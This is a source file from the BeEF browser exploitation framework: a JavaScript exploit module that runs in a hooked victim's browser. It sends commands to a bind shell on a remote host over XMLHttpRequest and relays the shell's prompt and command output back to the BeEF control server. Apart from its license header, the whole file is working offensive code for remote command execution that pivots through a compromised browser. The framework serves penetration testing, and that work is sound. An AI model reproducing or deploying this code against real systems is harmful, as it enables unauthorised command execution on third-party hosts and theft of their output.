beef/modules/exploits/beefbind/beef_bind_shell/command.js

//
//   Copyright 2012 Wade Alcorn wade@bindshell.net
//
//   Licensed under the Apache License, Version 2.0 (the "License");
//   you may not use this file except in compliance with the License.
//   You may obtain a copy of the License at
//
//       http://www.apache.org/licenses/LICENSE-2.0
//
//   Unless required by applicable law or agreed to in writing, software
//   distributed under the License is distributed on an "AS IS" BASIS,
//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//   See the License for the specific language governing permissions and
//   limitations under the License.
//
beef.execute(function () {
    var rhost = '<%= @rhost %>';
    var rport = '<%= @rport %>';
    var path = '<%= @path %>';
    var cmd = '<%= @cmd %>';

    var uri = "http://" + rhost + ":" + rport + path;

    strip_output = function(output){

        var offset = 0;
        for(var c in output){
            c = output.charAt(c);
            if(c.charCodeAt(0) == 0){
                break;
            }
            offset++;
        }
        return output.substring(0,offset);
    };

    var counter = 0;
    get_additional_cmd_results = function(){
        xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function(){
            if(xhr.readyState == 4){
                var result = strip_output(xhr.responseText);
                console.log("result.length: " + result.length);
                if(result.length != 0){
                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
                    beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
                        counter++;
                        setTimeout("get_additional_cmd_results()",500);
                        }
             }else{ // No more command results, ready to send another command.
                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
            }
        };
        xhr.open("GET", uri, false);
        xhr.send(null);
    };

    get_prompt = function () {

        xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function(){
            if(xhr.readyState == 4){
                console.log("get_prompt: Retrieved prompt");
                var prompt = strip_output(xhr.responseText);
                console.log(prompt);
                beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);

                //send command
                send_command(cmd);
            }
        };
        xhr.open("GET", uri, false);
        xhr.send(null);
    };

    send_command = function(command){
        xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function(){
            var cmd_result = strip_output(xhr.responseText);
            console.log(cmd_result);
            beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
        };
        xhr.open("POST", uri, false);
        xhr.setRequestHeader("Content-Type", "text/plain");
        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
        xhr.send(command);
        setTimeout("get_additional_cmd_results()",500);
    };



get_prompt();

});